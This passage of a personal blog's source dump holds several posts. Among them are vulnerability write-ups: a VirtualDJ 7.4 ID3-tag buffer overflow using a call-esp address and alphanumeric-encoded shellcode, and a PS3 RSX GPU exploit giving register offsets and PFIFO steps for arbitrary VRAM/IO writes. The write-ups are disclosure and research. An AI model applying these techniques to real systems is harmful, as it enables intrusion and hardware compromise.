71 | ## Log
72 |
73 | * __2013-04-07__: Bug discovered. VirtualDJ was emailed about this a few days later.
74 | * __2013-04-20__: Bug ignored. Exploit published.
75 |
--------------------------------------------------------------------------------
/posts/2013-04-20-virtualdj-74-buffer-overflow/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | VirtualDJ Pro/Home 7.4: Buffer Overflow
8 |
9 |
10 |
11 |
51 |
52 |
53 |
54 |
I have found a buffer overflow vulnerability in VirtualDJ Pro 7.4 and VirtualDJ Home 7.4 and possibly previous versions of this software. After right-clicking a file and entering the "File Infos" > "Cover..." menu, VirtualDJ tries to find a cover for the given file on Google Images and stores the request URL in a buffer which looks like: "http://images.google.com/images?q=X" where X corresponds to the ID3 tag Title. Special characters of this tag are ignored, and any sequence of symbols (e.g. ' ', '-', '_') is replaced with '+'. The problem is once again that VirtualDJ does not check if the information stored in the ID3 tags is too big to fit in the buffer.
74 |
To exploit this vulnerability, I searched for a call esp instruction stored in an address that could be represented with alphanumeric characters, I found such instruction in 0x444D4C64, that is, "dLMD". After entering this call, all the bytes after the Fake Title + Spaces + Padding + "dLMD" will be executed. Since we can only use alphanumeric characters, we have to encode the shellcode and decode it in execution time using only bytes in range [0-9A-Za-z]. For this purpose I used a function from ALPHA3. After that, the original shellcode will be decoded and executed.
You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=Yini294AR2Q.
133 |
Log
134 |
135 |
2013-04-07: Bug discovered. VirtualDJ was emailed about this a few days later.
136 |
2013-04-20: Bug ignored. Exploit published.
137 |
138 |
139 |
140 |
146 |
147 |
148 |
--------------------------------------------------------------------------------
/posts/2016-03-16-ps3-gpu-exploit/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2016-03-16
4 | title: PS3 GPU Full VRAM/IO access exploit
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | ## Introduction
9 |
10 | During the early development of the PlayStation 3 emulator project [Nucleus](https://github.com/AlexAltea/nucleus), it was decided to do a high-level emulation of the PlayStation 3 kernel known as CellOS Lv-2, often shortened to *LV2*. This implied reverse engineering and reimplementing the kernel, and intercept the syscalls used by the user-mode applications. The correct reimplementation of a certain group of syscalls, the kernel-level RSX driver interface with prefix `sys_rsx`, was crucial to the success of the GPU emulation. Additionally, these syscalls are a thin wrapper of the actual hypervisor-level RSX driver, accessible through the `lv1_gpu` syscalls.
11 |
12 | Between February 2016 and March 2016, the developer *@3141card* reverse engineered the RSX driver code found in both layers. These sources, combined with the documentation and headers from the [Envytools](https://github.com/envytools/envytools)/[Nouveau](https://nouveau.freedesktop.org) projects and advice from *@mwk* eased the security analysis, resulting in the vulnerability presented here.
13 |
14 | ## Reality Synthesizer
15 |
16 | The Reality Synthesizer, commonly shortened to RSX, is the PlayStation 3 GPU and is composed of multiple engines. Gross over-simplifications take place throughout this section for the sake of readability. RSX exposes 3 Base Address Registers (BARs):
17 |
18 | | BAR | Offset | Size | Description |
19 | |--------|-----------------|---------|-------------|
20 | | *BAR0* | `0x28000000000` | 32 MB | MMIO |
21 | | *BAR1* | `0x28080000000` | 256 MB | VRAM |
22 | | *BAR2* | `0x28002000000` | *???* | RAMIN |
23 |
24 | While *BAR0* points to the MMIO register area, both *BAR1* and *BAR2* map to the same 256 MB DDR memory. The difference is that BAR2 offsets are reversed, starting from the end of the VRAM and going to the beginning in chunks of 512 KB. Following formulas can be used to convert a BAR1 offset into a BAR2 offset and vice-versa:
25 |
26 | ```cpp
27 | uint32_t addr_vram_to_pramin(uint32_t offset) {
28 | uint32_t vram_size = 0x10000000; // 256 MB
29 | uint32_t rev_size = 0x80000; // 512 KB
30 | return (offset - vram_size) ^ -rev_size;
31 | }
32 |
33 | uint32_t addr_ramin_to_vram(uint32_t offset) {
34 | uint32_t vram_size = 0x10000000; // 256 MB
35 | uint32_t rev_size = 0x80000; // 512 KB
36 | return vram_size - (offset - (offset % rev_size)) - rev_size + (offset % rev_size);
37 | }
38 | ```
39 |
40 | The driver fills RAMIN with objects which can be either *Engine objects* or *DMA objects*, commonly known as *FIFO objects*. The first kind describe engines that do a particular task (e.g. 2D graphics, 3D graphics, memory copying, etc.) the latter describe a DMA-accessible location.
41 |
42 | Certain methods require a DMA object in order to know which data to access. Rather than directly passing the RAMIN offset to the engine, the driver populates hash-table known as *RAMHT* which maps a unique handler to the RAMIN offset where the target DMA object is located.
43 |
44 | The DMA objects contain information about the access type, the range size and starting offset. Taking into account the IO segments mapped by LV1, a DMA object can reference the following offsets:
45 |
46 | | Offset | Description |
47 | |-----------------------------|-------------------|
48 | | `0x00000000` - `0x0FFFFFFF` | VRAM |
49 | | `0x80000000` - `0x8FFFFFFF` | IOMMU (Context 0) |
50 | | `0x90000000` - `0x9FFFFFFF` | IOMMU (Context 1) |
51 |
52 | ## Exploit
53 |
54 | ### RSX MMIO register mapping
55 |
56 | The LV2 kernel provides the following syscall:
57 |
58 | ```cpp
59 | // LV2 SysCall 675 (0x2A3)
60 | uint64_t sys_rsx_device_map(uint64_t mmio_addr, uint64_t vram_addr, uint64_t device_id);
61 | ```
62 |
63 | The table below lists the RSX devices that can be mapped through this syscall. The highlighted entries correspond to the devices involved in the vulnerability:
64 |
65 | | Device | MMIO | VRAM | Description | Control |
66 | |--------|----------------|------------------|-----------------|---------|
67 | | 5 | `0x08A000` | `----------` | | No |
68 | | 6 | `0x200000` | `----------` | PMEDIA | No |
69 | | 7 | `0x600000` | `----------` | PCRTC | No |
70 | | 8 | `--------` | `0x0FF10000` | | No |
71 | | 9 | `0x400000` | `----------` | PGRAPH | Yes |
72 | | 10 | `0x100000` | `----------` | PFB | Yes |
73 | | 11 | `0x00A000` | `----------` | PCOUNTER | Yes |
74 | | 12 | `0x680000` | `----------` | | Yes |
75 | | 13 | `0x090000` | `----------` | | Yes |
76 | | __14__ | __`0x002000`__ | __`----------`__ | __PFIFO__ | __Yes__ |
77 | | 15 | `0x088000` | `----------` | IOIF | Yes |
78 |
79 | By mapping the device 14, we can access the PFIFO MMIO registers from the userland code (or LV2 if `ss.param.fself.control` prevents from doing that and the EEPROM cannot be patched). Among the many PFIFO registers listed in the Nouveau headers and documents, some of them struck as particularly dangerous if misused. These registers are described below:
80 |
81 | * `0x002140` *NV03_PFIFO_INTR_EN_0*: Disable the interrupts that trigger LV1 panics.
82 | * `0x002210` *NV03_PFIFO_RAMHT*: Controls the size and RAMIN offset of RAMHT.
83 | * `0x002218` *NV03_PFIFO_RAMRO*: Controls the size and RAMIN offset of RAMRO.
84 | * `0x002504` *NV04_PFIFO_MODE*: Alternate between PIO and DMA mode in channels.
85 |
86 | These register fields are described in detail here in [nv1_pfifo.xml](https://github.com/envytools/envytools/blob/master/rnndb/fifo/nv1_pfifo.xml). CellOS-LV1 sets RAMHT at RAMIN offset `0x10000` and a 16 KB uin size and RAMRO at RAMIN offset `0x18000` with 512 bytes in size.
87 |
88 | ### RAMHT manipulation attempt
89 |
90 | Our best chance to create custom DMA objects is to create a RAMHT entry pointing to an accessible VRAM area. The first attempt to do so would be moving RAMHT to reinterpret other byte sequences as valid entries. By the information before, RAMHT can only be relocated in the range *0x0* to *0x1F000* and have an alignment of 4 KB. In order to get a valid RAMHT entry poiting to our VRAM area, we need to find 8 byte sequence satisfying:
91 |
92 | 1. Reinterpreting the bits 31:23 (MSB:LSB) of the second word is equal to 1 (i.e. our application's PFIFO channel).
93 | 2. Reinterpreting the bits 19:0 (MSB:LSB) of the second word is a value in range `[0x20000-0xFFFFF]` (mappable VRAM).
94 | 3. Calculating the RAMHT offset minus the entry offset results in a multiple of 4 KB.
95 |
96 | These conditions are hard to satisfy and aside from unlikely random values that might have been written during memtest, they will not be found in this range.
97 |
98 | ### RAMRO as RAMHT entry generator
99 |
100 | However, there is still a way to get such entries in RAMHT. RAMRO can only be relocated in the range *0x0* to *0x1FE00* and have an alignment of 512 byte. The submission of invalid PFIFO commands causes 8 byte writes in RAMRO in which the first word holds the error report and the second word the submitted argument. We can control the argument and predict the error report, thus being able to generate valid RAMHT entries. In order to preserve the integrity of RAMHT we should ensure that no existing entry is overwritten:
101 |
102 | 1. Invalid PFIFO methods that trigger RAMRO writes in PIO mode are: { 0x0040, 0x0044, 0x0048, 0x0054 }.
103 | 2. Their corresponding RAMRO error reports are { 0x50401040, 0x50401044, 0x50401048, 0x50401054 }.
104 | 3. Their corresponding RAMHT offset for channel 1 are: { 0x0C18, 0x0C38, 0x0C58, 0x0CB8 }.
105 |
106 | After computing the RAMHT offsets for all pairs consisting of any handles ever created by the LV1 driver and any possible channels ID (up to the maximum of 4 that LV1 supports), we know that no handle will ever be placed by the driver in the RAMHT range `0xC00` - `0xCFF` (note that `0xC00` is 512 byte aligned). Threfore RAMRO could be moved inside RAMHT without fearing a collision.
107 |
108 | ### Accessing custom DMA objects
109 |
110 | The reserved VRAM for `vsh.self` (VirtualShell/XMB), i.e. channel 0, is allocated from the front and the remaining VRAM aside from the first 2 MB of RAMIN is assigned to the application, i.e. channel 1, by the GCM library. Therefore any RAMIN offset bigger than 2 MB assigned to channel 1 will lie in an accessible VRAM area. E.g.:
111 |
112 | ```cpp
113 | 0x00808000 == (1 /*Channel ID*/ << 23) | (0x800000 /*RAMIN offset at 8 MB*/ >> 4)
114 | ```
115 |
116 | The only remaining step is placing our custom DMA object in that offset. Finally a combination of the PFIFO puller methods can be used to trigger a write in our custom DMA range:
117 |
118 | * `0x0060` *NV406E_SET_CONTEXT_DMA_SEMAPHORE*: Set DMA object handle (i.e. the `0x504010XX` reports above)
119 | * `0x0064` *NV406E_SEMAPHORE_OFFSET*: Set the offset we want to write in.
120 | * `0x006C` *NV406E_SEMAPHORE_RELEASE*: Write the specified value there.
121 |
122 | If the specified value ends up at said offset in the range specified by our DMA object the exploit succeeded.
123 |
--------------------------------------------------------------------------------
/posts/2016-03-16-ps3-gpu-exploit/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | PS3 GPU Full VRAM/IO access exploit
8 |
9 |
10 |
11 |
51 |
52 |
53 |
54 |
During the early development of the PlayStation 3 emulator project Nucleus, it was decided to do a high-level emulation of the PlayStation 3 kernel known as CellOS Lv-2, often shortened to LV2. This implied reverse engineering and reimplementing the kernel, and intercept the syscalls used by the user-mode applications. The correct reimplementation of a certain group of syscalls, the kernel-level RSX driver interface with prefix sys_rsx, was crucial to the success of the GPU emulation. Additionally, these syscalls are a thin wrapper of the actual hypervisor-level RSX driver, accessible through the lv1_gpu syscalls.
75 |
Between February 2016 and March 2016, the developer @3141card reverse engineered the RSX driver code found in both layers. These sources, combined with the documentation and headers from the Envytools/Nouveau projects and advice from @mwk eased the security analysis, resulting in the vulnerability presented here.
76 |
Reality Synthesizer
77 |
The Reality Synthesizer, commonly shortened to RSX, is the PlayStation 3 GPU and is composed of multiple engines. Gross over-simplifications take place throughout this section for the sake of readability. RSX exposes 3 Base Address Registers (BARs):
78 |
79 |
80 |
81 |
BAR
82 |
Offset
83 |
Size
84 |
Description
85 |
86 |
87 |
88 |
89 |
BAR0
90 |
0x28000000000
91 |
32 MB
92 |
MMIO
93 |
94 |
95 |
BAR1
96 |
0x28080000000
97 |
256 MB
98 |
VRAM
99 |
100 |
101 |
BAR2
102 |
0x28002000000
103 |
???
104 |
RAMIN
105 |
106 |
107 |
108 |
While BAR0 points to the MMIO register area, both BAR1 and BAR2 map to the same 256 MB DDR memory. The difference is that BAR2 offsets are reversed, starting from the end of the VRAM and going to the beginning in chunks of 512 KB. Following formulas can be used to convert a BAR1 offset into a BAR2 offset and vice-versa:
The driver fills RAMIN with objects which can be either Engine objects or DMA objects, commonly known as FIFO objects. The first kind describe engines that do a particular task (e.g. 2D graphics, 3D graphics, memory copying, etc.) the latter describe a DMA-accessible location.
124 |
Certain methods require a DMA object in order to know which data to access. Rather than directly passing the RAMIN offset to the engine, the driver populates hash-table known as RAMHT which maps a unique handler to the RAMIN offset where the target DMA object is located.
125 |
The DMA objects contain information about the access type, the range size and starting offset. Taking into account the IO segments mapped by LV1, a DMA object can reference the following offsets:
The table below lists the RSX devices that can be mapped through this syscall. The highlighted entries correspond to the devices involved in the vulnerability:
157 |
158 |
159 |
160 |
Device
161 |
MMIO
162 |
VRAM
163 |
Description
164 |
Control
165 |
166 |
167 |
168 |
169 |
5
170 |
0x08A000
171 |
----------
172 |
173 |
No
174 |
175 |
176 |
6
177 |
0x200000
178 |
----------
179 |
PMEDIA
180 |
No
181 |
182 |
183 |
7
184 |
0x600000
185 |
----------
186 |
PCRTC
187 |
No
188 |
189 |
190 |
8
191 |
--------
192 |
0x0FF10000
193 |
194 |
No
195 |
196 |
197 |
9
198 |
0x400000
199 |
----------
200 |
PGRAPH
201 |
Yes
202 |
203 |
204 |
10
205 |
0x100000
206 |
----------
207 |
PFB
208 |
Yes
209 |
210 |
211 |
11
212 |
0x00A000
213 |
----------
214 |
PCOUNTER
215 |
Yes
216 |
217 |
218 |
12
219 |
0x680000
220 |
----------
221 |
222 |
Yes
223 |
224 |
225 |
13
226 |
0x090000
227 |
----------
228 |
229 |
Yes
230 |
231 |
232 |
14
233 |
0x002000
234 |
----------
235 |
PFIFO
236 |
Yes
237 |
238 |
239 |
15
240 |
0x088000
241 |
----------
242 |
IOIF
243 |
Yes
244 |
245 |
246 |
247 |
By mapping the device 14, we can access the PFIFO MMIO registers from the userland code (or LV2 if ss.param.fself.control prevents from doing that and the EEPROM cannot be patched). Among the many PFIFO registers listed in the Nouveau headers and documents, some of them struck as particularly dangerous if misused. These registers are described below:
248 |
249 |
0x002140NV03_PFIFO_INTR_EN_0: Disable the interrupts that trigger LV1 panics.
250 |
0x002210NV03_PFIFO_RAMHT: Controls the size and RAMIN offset of RAMHT.
251 |
0x002218NV03_PFIFO_RAMRO: Controls the size and RAMIN offset of RAMRO.
252 |
0x002504NV04_PFIFO_MODE: Alternate between PIO and DMA mode in channels.
253 |
254 |
These register fields are described in detail here in nv1_pfifo.xml. CellOS-LV1 sets RAMHT at RAMIN offset 0x10000 and a 16 KB uin size and RAMRO at RAMIN offset 0x18000 with 512 bytes in size.
255 |
RAMHT manipulation attempt
256 |
Our best chance to create custom DMA objects is to create a RAMHT entry pointing to an accessible VRAM area. The first attempt to do so would be moving RAMHT to reinterpret other byte sequences as valid entries. By the information before, RAMHT can only be relocated in the range 0x0 to 0x1F000 and have an alignment of 4 KB. In order to get a valid RAMHT entry poiting to our VRAM area, we need to find 8 byte sequence satisfying:
257 |
258 |
Reinterpreting the bits 31:23 (MSB:LSB) of the second word is equal to 1 (i.e. our application's PFIFO channel).
259 |
Reinterpreting the bits 19:0 (MSB:LSB) of the second word is a value in range [0x20000-0xFFFFF] (mappable VRAM).
260 |
Calculating the RAMHT offset minus the entry offset results in a multiple of 4 KB.
261 |
262 |
These conditions are hard to satisfy and aside from unlikely random values that might have been written during memtest, they will not be found in this range.
263 |
RAMRO as RAMHT entry generator
264 |
However, there is still a way to get such entries in RAMHT. RAMRO can only be relocated in the range 0x0 to 0x1FE00 and have an alignment of 512 byte. The submission of invalid PFIFO commands causes 8 byte writes in RAMRO in which the first word holds the error report and the second word the submitted argument. We can control the argument and predict the error report, thus being able to generate valid RAMHT entries. In order to preserve the integrity of RAMHT we should ensure that no existing entry is overwritten:
265 |
266 |
Invalid PFIFO methods that trigger RAMRO writes in PIO mode are: { 0x0040, 0x0044, 0x0048, 0x0054 }.
267 |
Their corresponding RAMRO error reports are { 0x50401040, 0x50401044, 0x50401048, 0x50401054 }.
268 |
Their corresponding RAMHT offset for channel 1 are: { 0x0C18, 0x0C38, 0x0C58, 0x0CB8 }.
269 |
270 |
After computing the RAMHT offsets for all pairs consisting of any handles ever created by the LV1 driver and any possible channels ID (up to the maximum of 4 that LV1 supports), we know that no handle will ever be placed by the driver in the RAMHT range 0xC00 - 0xCFF (note that 0xC00 is 512 byte aligned). Threfore RAMRO could be moved inside RAMHT without fearing a collision.
271 |
Accessing custom DMA objects
272 |
The reserved VRAM for vsh.self (VirtualShell/XMB), i.e. channel 0, is allocated from the front and the remaining VRAM aside from the first 2 MB of RAMIN is assigned to the application, i.e. channel 1, by the GCM library. Therefore any RAMIN offset bigger than 2 MB assigned to channel 1 will lie in an accessible VRAM area. E.g.:
273 |
0x00808000==(1/*Channel ID*/<<23)|(0x800000/*RAMIN offset at 8 MB*/>>4)
274 |
275 |
276 |
277 |
The only remaining step is placing our custom DMA object in that offset. Finally a combination of the PFIFO puller methods can be used to trigger a write in our custom DMA range:
278 |
279 |
0x0060NV406E_SET_CONTEXT_DMA_SEMAPHORE: Set DMA object handle (i.e. the 0x504010XX reports above)
280 |
0x0064NV406E_SEMAPHORE_OFFSET: Set the offset we want to write in.
281 |
0x006CNV406E_SEMAPHORE_RELEASE: Write the specified value there.
282 |
283 |
If the specified value ends up at said offset in the range specified by our DMA object the exploit succeeded.
284 |
285 |
286 |
292 |
293 |
294 |
--------------------------------------------------------------------------------
/posts/2016-08-22-observations/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: live
3 | date: 2016-08-22
4 | title: Observations
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | Random observations, questions, and interesting facts that caught my attention. If you can expand or answer any of these, please feel free to contact me.
9 |
10 | ## Light
11 |
12 | * When observing a blacklight or UV-A light, i.e. one of these blue/purple-ish lamps that make white and fluorescent objects specially bright, my eyes disagree on the perceived light. From my point of view: My left eye shows it blurry, as if it couldn't focus on the light source and with a slightly darker-blue hue. My right eye can focuses correctly on the light source, but perceives it with a slightly brighter-purple color.
13 |
14 | * Doing fast eye movements while keeping a LED-based white light in my field of view, makes the light be perceived as separate red-green-blue components at different positions. Why does this happen?
15 |
16 | * When firing small handheld lasers, one can perceive a fine-grained pattern of dots where the beam hits. Any small translation or rotation of the laser diode seem to completely change this pattern. Since involuntary movements are hard to avoid the resulting effect looks like video noise. Why does this happen?
17 |
18 |
19 | ## Climate
20 |
21 | * Suggested by the *clathrate gun hypothesis* [1], the rise in global temperatures will cause, or is causing, vast amounts of methane gas to be released to the athmosphere. The impact of methane gas is more than 25 times higher than carbon dioxide [2], thus resulting in devastating consequences for the whole planet. The burning methane corresponds to the reaction: CH4 + 2 O2 -> CO2 + 2 H2O. Question: Assuming the chain reaction has already started and is inevitable, why don't we burn the methane deposits under the siberian permafrost?
22 | 1. https://en.wikipedia.org/wiki/Clathrate_gun_hypothesis
23 | 2. https://www3.epa.gov/climatechange/ghgemissions/gases/ch4.html
24 |
--------------------------------------------------------------------------------
/posts/2016-08-22-observations/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | Observations
8 |
9 |
10 |
11 |
51 |
52 |
53 |
54 |
Random observations, questions, and interesting facts that caught my attention. If you can expand or answer any of these, please feel free to contact me.
74 |
Light
75 |
76 |
77 |
When observing a blacklight or UV-A light, i.e. one of these blue/purple-ish lamps that make white and fluorescent objects specially bright, my eyes disagree on the perceived light. From my point of view: My left eye shows it blurry, as if it couldn't focus on the light source and with a slightly darker-blue hue. My right eye can focuses correctly on the light source, but perceives it with a slightly brighter-purple color.
78 |
79 |
80 |
Doing fast eye movements while keeping a LED-based white light in my field of view, makes the light be perceived as separate red-green-blue components at different positions. Why does this happen?
81 |
82 |
83 |
When firing small handheld lasers, one can perceive a fine-grained pattern of dots where the beam hits. Any small translation or rotation of the laser diode seem to completely change this pattern. Since involuntary movements are hard to avoid the resulting effect looks like video noise. Why does this happen?
84 |
85 |
86 |
Climate
87 |
88 |
Suggested by the clathrate gun hypothesis [1], the rise in global temperatures will cause, or is causing, vast amounts of methane gas to be released to the athmosphere. The impact of methane gas is more than 25 times higher than carbon dioxide [2], thus resulting in devastating consequences for the whole planet. The burning methane corresponds to the reaction: CH4 + 2 O2 -> CO2 + 2 H2O. Question: Assuming the chain reaction has already started and is inevitable, why don't we burn the methane deposits under the siberian permafrost?
89 |
94 |
95 |
96 |
102 |
103 |
104 |
--------------------------------------------------------------------------------
/posts/2016-09-14-jit-compiled-maps/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2016-09-07
4 | title: Fast lookups in JIT-compiled maps
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | This post shows a way of optimizing lookup performance in maps associating integer keys to arbitrary data.
9 |
10 | ## Background
11 |
12 | Some time ago, I reimplemented the [RSX GPU](https://en.wikipedia.org/wiki/RSX_%27Reality_Synthesizer%27) command processor in the emulator, [Nucleus](https://github.com/AlexAltea/nucleus). This GPU is made of several engines, each bound at a specific index (*0*-*7*) of the command processor, and each index provides a MMIO register window (*0x0*-*0x1FFC*). Commands are 16-bit bitfields containing an index (3-bit) and MMIO offset (13-bit). Recent userland drivers always bound engines to the same indices and there was a limited number valid MMIO offsets, our command processor was just a big hardcoded *switch-case* mapping commands to corresponding emulator function.
13 |
14 | However, older or custom drivers might bind engines at different indices making our compile-time *switch-case* useless. Ignoring wasted memory, a static array of 2^16 entries could be a fast solution. Nevertheless, 32-bit or 64-bit commands could have made this impossible. Since lookup times are critical, this yields the question, **what's the fastest way of doing a lookup in a set of sparse commands -or sparse non-random integers- generated at runtime?** Should we use huge static arrays? Should we use hash tables? Which data structure will optimize lookup time?
15 |
16 | Jitter solves this by letting the compiler decide that.
17 |
18 | ---
19 |
20 | __TODO: More information soon.__
21 |
--------------------------------------------------------------------------------
/posts/2016-09-14-jit-compiled-maps/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | Fast lookups in JIT-compiled maps
8 |
9 |
10 |
11 |
51 |
52 |
53 |
54 |
This post shows a way of optimizing lookup performance in maps associating integer keys to arbitrary data.
74 |
Background
75 |
Some time ago, I reimplemented the RSX GPU command processor in the emulator, Nucleus. This GPU is made of several engines, each bound at a specific index (0-7) of the command processor, and each index provides a MMIO register window (0x0-0x1FFC). Commands are 16-bit bitfields containing an index (3-bit) and MMIO offset (13-bit). Recent userland drivers always bound engines to the same indices and there was a limited number valid MMIO offsets, our command processor was just a big hardcoded switch-case mapping commands to corresponding emulator function.
76 |
However, older or custom drivers might bind engines at different indices making our compile-time switch-case useless. Ignoring wasted memory, a static array of 2^16 entries could be a fast solution. Nevertheless, 32-bit or 64-bit commands could have made this impossible. Since lookup times are critical, this yields the question, what's the fastest way of doing a lookup in a set of sparse commands -or sparse non-random integers- generated at runtime? Should we use huge static arrays? Should we use hash tables? Which data structure will optimize lookup time?
77 |
Jitter solves this by letting the compiler decide that.
This article aims to give an intuitive understanding for the terms "Low-Level Emulation" (LLE) and "High-Level Emulation" (HLE) often heard in the emulation scene, their differences and tradeoffs in development/performance costs, and how developers choose one paradigm or the other.
75 |
Machines are made of several layers of abstraction, each of them relying in the layer below to perform some particular task. In the context of gaming consoles, you might consider these layers (ordered from higher to lower level):
76 |
77 |
Game
78 |
Game engine
79 |
System libraries
80 |
Kernel/drivers
81 |
Hardware
82 |
83 |
That's where these "low-level" or "high-level" terms come from. Something is more "high-level" when it has more layers of abstraction below it, and it's more "low-level" when it has more layers of abstraction above it. With so many layers, the terms "low" and "high" can become quite subjective (developers can't even agree about whether some emulators are HLE or LLE). Furthermore, you could go even below than hardware-level and start thinking about transistors, atoms, etc. as even deeper layers of abstraction. Similarly, there's also even higher levels like the game scripts that are sometimes used to handle events/dialogues in a game. Of course, for most emulators, these layers are either too low, or too high. Why?
84 |
Emulation paradigms
85 |
Let's tackle this question after giving an intuitive notion of what emulation is. Emulating a system all about putting a "barrier" between two adjacent layers of abstraction. For instance:
86 |
87 |
"LLE emulators" (EPSXE, PCSX2): They put the barrier between the hardware and the kernel. The entire software stack would run as usual thinking it's on a real PS1, PS2 etc., but whenever the hardware is accessed (e.g. PCI configuration registers, MMIO accesses, etc.) the emulator would intercept that and execute whatever the emudevs wanted. This is the reason why you get the original console menus and the overall "look and feel" of the console.
88 |
"HLE emulators" (RPCS3, Citra): They put the barrier between the kernel and userland (i.e. applications, games, etc.). The application runs as usual (of course, after translating userland instructions), but whenever it needs to access the operating system (e.g. to open files, to map memory, to create threads), that request aka. syscall will be intercepted and handled by some code written by the emudevs. This is the reason why you can typically just drag-and-drop a game and start playing it without booting any underlying OS.
89 |
90 |
Back to the original question, why do emulators pick the barriers always at these two "hot spots", i.e. LLE (hardware and kernel) and HLE (kernel and userland)?
91 |
When you place this "emulation" barrier between two layers, you have to reimplement the layer below (i.e. reimplement the hardware on LLE, reimplement the kernel on HLE), so that the layer(s) above it can execute successfully. This results in two costs that you have to balance: "development time" and "execution time". Let me explain why this balance is important with few extreme examples of poor balances:
92 |
93 |
94 |
Too high-level: What would happen if you'd put that barrier between the game engine and the actual game? This idea used to be not so crazy, as it's what https://www.scummvm.org/ does. However, game engines these days are insanely complex with several million lines of code, it would take you centuries as a single developer to write an emulator that operated at such high levels. The "development time" would be massive, but the "execution time" (i.e. the emulator's performance) would be pretty good, since all the complex tasks have been reimplemented natively for the host system.
95 |
96 |
97 |
Too low-level: What would happen if you wrote a transistor-level emulator? Again, not so crazy for old platforms, see the http://www.visual6502.org/ project. Assuming you had the equipment to decap a chip, a scanning electron microscope and fancy computer vision algorithms, you could easily generate code that simulates your target microprocessor, so little "development time", however, the "execution time" would be insanely high caused by simulating billions of transistors.
98 |
99 |
100 |
As you see, the rule of thumb is: higher-level incurs in larger development costs, and lower-level incurs in larger execution costs. But this is not always the case, and it has frequently led to misconceptions among the end-users. One of them is wrongly estimating the perfomance of different emulator paradigms.
101 |
Performance myths
102 |
Let's debunk some of those performance myths: Assume you want to emulate some machine, and you are learning about its hardware/software to balence "development time" vs "execution time" and pick the right strategy. How do you estimate those costs, specially "execution time", aside from the naive rule of thumb above? Estimating how fast something will run isn't just about which levels of abstraction you are targetting. The resulting performance will be depend on how many "concepts" from your guest machine (i.e. the thing you're trying to emulate), can be mapped into your host machine (the thing that will run the emulator).
103 |
To give you an example, one such "concept" is the MMU. To explain it briefly (and slightly wrong/oversimplified but for the sake of the explanation will do), the MMU is the thing that allows each application have access to a slice of RAM by mapping addresses of a "virtual address space" (an imaginary arrangement of memory) to a "physical address space" (the actual RAM). Every time the application accesses the memory with some CPU instruction, behind the scenes the MMU will translate the virtual address given by the application into a physical one.
104 |
105 |
106 |
HLE emulators typically don't worry about the guest MMU since guest applications only use virtual addressing and whenever they try to contact the guest kernel (e.g. to allocate more memory), the emulator takes control and very generously gives the guest application a chunk of its own host virtual memory. So everyone's happy.
107 |
108 |
109 |
LLE emulators have to worry about both the guest virtual memory and the guest physical memory. Many of them allocate guest physical memory during initialization, and do the "guest virtual memory to guest physical memory" translation by emulating the MMU on software. That causes every memory access (1 instruction) to invoke some specialized code that does the translation+access (100's of instructions). Of course, some translations can be cached, but the performance hit is still high. Remember that for every guest access, you have to traverse 4 layers:
110 |
111 |
Guest virtual memory
112 |
Guest physical memory
113 |
Host virtual memory
114 |
Host physical memory
115 |
116 |
117 |
118 |
However in some scenarios (this depends on MMU quirks, page sizes, etc.), you could have use your host computer's own MMU to handle the accesses of the guest applications directly. One way of accomplishing this is running the guest software in a VM and having an hypervisor letting it directly access a slice of the host computer's physical RAM directly. This would remove the need for expensive software-based address translation and result in large performance gains.
119 |
Conclusion
120 |
By making a better use of the host machine's resources, in the MMU and many other different areas, you can make even low-level emulation happen with an acceptable performance. It's not a surprise that Sony used this strategy to emulate the PS2 on the PS3, and Microsoft to emulate the Xbox on Xbox 360 [1] and Xbox 360 on Xbox One. This 10x performance slowdown while doing LLE is a myth, resulting from many oversimplifications and/or people that have poorly utilized the host machine's resources.
121 |
Of course, massive slowdowns can still happen: with really heterogeneous architectures, some concepts can be hard to map into each other and you might have to resort to software emulation incurring in 10x and 100x performance penalties, but this isn't always necessarily the case. There are no magic "performance penalty" numbers, everything has to be considered in a case-by-case basis, and the only way of estimating what that would be is getting to know both guest and host systems really in detail.
122 |
123 |
124 |
130 |
131 |
132 |
--------------------------------------------------------------------------------
/posts/2019-02-16-cell-miner-alu/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2019-02-16
4 | title: PS3/Cell Cryptomining: Wide arithmetic on SPUs
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | [TOC]
9 |
10 | ## Background
11 |
12 | Some time ago, I implemented a cryptocurrency miner for the [Cell B.E. Architecture](https://en.wikipedia.org/wiki/Cell_(microprocessor)) used in the PlayStation 3 and certain servers. Specifically, the goal was implementing PoW-algorithms based on CryptoNight, described by the [CryptoNote](https://cryptonote.org/standards/) standards and used by [Monero/XMR](https://www.getmonero.org/).
13 |
14 | At their current valuation, no such cryptocurrency can be profitably mined using consumer PlayStation 3 hardware and this situation is not expected to revert in the short/mid term. Furthermore, possible long-term changes are irrelevant, as newer hardware will increasingly outperform the Cell B.E., raising mining difficulty and the profitability threshold ever further.
15 |
16 | Consequently, I'm releasing the source code of this miner along with blog articles on technical aspects of Cell B.E. that might be of general interest (even if just for historical reasons):
17 |
18 | 1. [PS3/Cell Cryptomining: Wide arithmetic on SPUs](.).
19 | 2. [PS3/Cell Cryptomining: High-performance AES on SPUs](#). (TBD.)
20 | 3. [PS3/Cell Cryptomining: Memory Flow Controller](#). (TBD.)
21 |
22 | This first post describes the implementation of wide arithmetic operations on "narrow" ALUs present in the SPUs.
23 |
24 | ## Multiplication (64-bit)
25 |
26 | CryptoNight requires a 64-bit x 64-bit integer multiplication that results in a 128-bit integer. Implementing such operation on the SPUs is challenging as the largest multiplication granularity available is 16-bit x 16-bit to 32-bit due to the word-size limitations of the SPU ALUs. The following algorithm describes how to emulate such multiplication.
27 |
28 | ### Theory
29 |
30 | Consider the `a` and `b` input registers, the 64-bit LHS and RHS of the multiplication operation are composed of the half-words [a0, a1, a2, a3] and [b0, b1, b2, b3], respectively.
31 |
32 | ```
